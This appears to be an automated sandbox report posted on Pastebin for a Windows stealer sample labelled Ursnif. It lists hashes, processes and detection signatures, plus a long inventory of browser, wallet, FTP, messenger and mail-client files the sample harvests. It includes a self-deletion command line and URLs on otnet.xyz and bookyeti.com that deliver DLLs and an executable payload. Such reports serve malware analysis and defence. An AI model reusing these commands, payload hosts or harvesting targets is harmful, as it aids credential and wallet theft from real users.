Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "Ursnif"
- * MalScore: 10.0
- * File Name: "Ursnif_6cc70fb7b014fe253989338d5008381d.exe"
- * File Size: 664576
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "83502653aa68b492d6382416ecc27a7350be45968211f117ab2a860fb5fe093d"
- * MD5: "6cc70fb7b014fe253989338d5008381d"
- * SHA1: "eaab87820e5da8b64eb2d2bc2e2bbbac3a43130f"
- * SHA512: "e4dbdaaac28eeb15ea6cbd3554090f2883a4a905681269ac72380480d9cc51dc2f079ba7fc37bfe8534d94ffd0629e8bfbcc6c45980ed0300aae9369ad72f01a"
- * CRC32: "2349236C"
- * SSDEEP: "12288:EGolQnTahriSgWOGi80bfjPpBGxP7+BubZa3BR/mLV09J569buuKa1:EGR+hriSgUi80DOxVa3mLuJ569Cub1"
- * Process Execution:
- "Ursnif_6cc70fb7b014fe253989338d5008381d.exe",
- "cmd.exe",
- "taskkill.exe",
- "services.exe",
- "svchost.exe",
- "WmiPrvSE.exe",
- "taskhost.exe",
- "sc.exe",
- "svchost.exe",
- "svchost.exe",
- "WerFault.exe",
- "wermgr.exe"
- * Executed Commands:
- "C:\\ProgramData\\JCXFRDIE2I.exe ",
- "C:\\Windows\\System32\\cmd.exe /c taskkill /im Ursnif_6cc70fb7b014fe253989338d5008381d.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_6cc70fb7b014fe253989338d5008381d.exe & exit",
- "C:\\Windows\\system32\\lsass.exe",
- "taskhost.exe $(Arg0)",
- "C:\\Windows\\system32\\sc.exe start w32time task_started",
- "C:\\Windows\\system32\\svchost.exe -k LocalService",
- "C:\\Windows\\system32\\svchost.exe -k netsvcs",
- "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
- "taskkill /im Ursnif_6cc70fb7b014fe253989338d5008381d.exe /f",
- "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
- "C:\\Windows\\system32\\WerFault.exe -u -p 2776 -s 288",
- "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\""
- * Signatures Detected:
- "Description": "At least one process apparently crashed during execution",
- "Details":
- "Description": "Creates RWX memory",
- "Details":
- "Description": "A process attempted to delay the analysis task.",
- "Details":
- "Process": "WmiPrvSE.exe tried to sleep 360 seconds, actually delayed analysis time by 0 seconds"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "Ursnif_6cc70fb7b014fe253989338d5008381d.exe -> C:\\ProgramData\\JCXFRDIE2I.exe"
- "Process": "Ursnif_6cc70fb7b014fe253989338d5008381d.exe -> C:\\Windows\\System32\\cmd.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
- "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
- "suspicious_request": "http://otnet.xyz/141"
- "suspicious_request": "http://otnet.xyz/freebl3.dll"
- "suspicious_request": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
- "suspicious_request": "http://otnet.xyz/mozglue.dll"
- "suspicious_request": "http://otnet.xyz/msvcp140.dll"
- "suspicious_request": "http://otnet.xyz/nss3.dll"
- "suspicious_request": "http://otnet.xyz/softokn3.dll"
- "suspicious_request": "http://otnet.xyz/vcruntime140.dll"
- "suspicious_request": "http://ip-api.com/line/"
- "suspicious_request": "http://otnet.xyz/"
- "suspicious_request": "http://bookyeti.com/img/3001.exe"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://otnet.xyz/141"
- "url": "http://otnet.xyz/freebl3.dll"
- "url": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
- "url": "http://otnet.xyz/mozglue.dll"
- "url": "http://otnet.xyz/msvcp140.dll"
- "url": "http://otnet.xyz/nss3.dll"
- "url": "http://otnet.xyz/softokn3.dll"
- "url": "http://otnet.xyz/vcruntime140.dll"
- "url": "http://ip-api.com/line/"
- "url": "http://otnet.xyz/"
- "url": "http://bookyeti.com/img/3001.exe"
- "Description": "Deletes its original binary from disk",
- "Details":
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 13574119 times"
- "Description": "Attempts to execute a binary from a dead or sinkholed URL",
- "Details":
- "dead_binary": "c:\\programdata\\jcxfrdie2i.exe"
- "Description": "Steals private information from local Internet browsers",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\IE_Cookies.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Edge_Cookies.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Google Chrome_Default.txt"
- "Description": "Collects information about installed applications",
- "Details":
- "Program": "Google Update Helper"
- "Program": "Microsoft Excel MUI 2013"
- "Program": "Microsoft Outlook MUI 2013"
- "Program": "Google Chrome"
- "Program": "Adobe Flash Player 29 NPAPI"
- "Program": "Adobe Flash Player 29 ActiveX"
- "Program": "Microsoft DCF MUI 2013"
- "Program": "Microsoft Access MUI 2013"
- "Program": "Microsoft Office Proofing Tools 2013 - English"
- "Program": "Adobe Acrobat Reader DC"
- "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
- "Program": "Microsoft Publisher MUI 2013"
- "Program": "Outils de v\\xef\\xbf\\xa9rification linguistique 2013 de Microsoft Office\\xef\\xbe\\xa0- Fran\\xef\\xbf\\xa7ais"
- "Program": "Microsoft Office Shared MUI 2013"
- "Program": "Microsoft Office OSM MUI 2013"
- "Program": "Microsoft InfoPath MUI 2013"
- "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
- "Program": "Microsoft Word MUI 2013"
- "Program": "Microsoft Groove MUI 2013"
- "Program": "Microsoft Access Setup Metadata MUI 2013"
- "Program": "Microsoft Office OSM UX MUI 2013"
- "Program": "Java Auto Updater"
- "Program": "Microsoft PowerPoint MUI 2013"
- "Program": "Microsoft Office Professional Plus 2013"
- "Program": "Adobe Refresh Manager"
- "Program": "Microsoft Office Proofing 2013"
- "Program": "Microsoft Lync MUI 2013"
- "Program": "Microsoft OneNote MUI 2013"
- "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
- "Details":
- "Description": "Checks the system manufacturer, likely for anti-virtualization",
- "Details":
- "Description": "Attempts to access Bitcoin/ALTCoin wallets",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\??"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x95\\x8b"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin\\*.*"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko\\*.*"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin\\*.*"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin\\"
- "Description": "Harvests credentials from local FTP client softwares",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
- "Description": "Harvests information related to installed instant messenger clients",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
- "Description": "Harvests information related to installed mail clients",
- "Details":
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000007"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000006"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000005"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000009"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000008"
- "Description": "Collects information to fingerprint the system",
- "Details":
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
- * Started Service:
- "VaultSvc",
- "WerSvc",
- "W32Time"
- * Mutexes:
- "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963",
- "Local\\WERReportingForProcess2776",
- "Global\\\\xe5\\x88\\x90\\xc2\\x90",
- "Global\\\\xed\\x95\\xb02",
- "WERUI_BEX64-eb71ef964c95de5826f5dbf6417783430b96dd1"
- * Modified Files:
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\passwords.txt",
- "C:\\ProgramData\\freebl3.dll",
- "C:\\ProgramData\\mozglue.dll",
- "C:\\ProgramData\\msvcp140.dll",
- "C:\\ProgramData\\nss3.dll",
- "C:\\ProgramData\\softokn3.dll",
- "C:\\ProgramData\\vcruntime140.dll",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\ld",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\historych",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\History\\Google Chrome_Default.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Downloads\\Google Chrome_Default.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\c",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Google Chrome_Default.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\wd",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Autofill\\Google Chrome_Default.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\CC\\Google Chrome_Default.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Soft\\Authy\\\\xec\\x90\\xa0\\xcd\\xb2\\xe0\\xb8\\xa8\\xc7\\x8b\\xeb\\x86\\x88\\xc7\\xb2\\xe9\\x95\\xb0\\xc8\\x83",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\IE_Cookies.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Edge_Cookies.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\cookie_list.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\outlook.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\information.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Files\\Default.zip",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x95\\x8b",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Ethereum\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectrumLTC\\\r",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Exodus\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectronCash\\\r",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MultiDoge\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Zcash\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DashCore\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\GoldCoinGLD\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IOCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\JAXX\\\r",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\screenshot.jpg",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\CA_00000000-0000-0000-0000-0000000000009437374709.zip",
- "C:\\ProgramData\\JCXFRDIE2I.exe",
- "C:\\ProgramData\\JCXFRDIE2I.exe:Zone.Identifier",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\16379d62-d2d1-45c7-a48c-f33b02ea0429",
- "\\??\\PIPE\\lsarpc",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBC62.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFBE.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFDE.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC713.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERBC62.tmp.appcompat.txt",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERBFBE.tmp.WERInternalMetadata.xml",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERBFDE.tmp.hdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERC713.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\Report.wer",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\Report.wer.tmp"
- * Deleted Files:
- "C:\\ProgramData\\freebl3.dll",
- "C:\\ProgramData\\mozglue.dll",
- "C:\\ProgramData\\msvcp140.dll",
- "C:\\ProgramData\\nss3.dll",
- "C:\\ProgramData\\softokn3.dll",
- "C:\\ProgramData\\vcruntime140.dll",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Autofill\\Google Chrome_Default.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Autofill",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\CC\\Google Chrome_Default.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\CC",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Edge_Cookies.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Google Chrome_Default.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\IE_Cookies.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\cookie_list.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Downloads\\Google Chrome_Default.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Downloads",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Files\\Default.zip",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Files",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\History\\Google Chrome_Default.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\History",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\information.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\outlook.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\passwords.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\screenshot.jpg",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Soft\\Authy",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Soft",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DashCore",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectronCash",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectrumLTC",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Ethereum",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Exodus",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\GoldCoinGLD",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IOCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\JAXX",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MultiDoge",
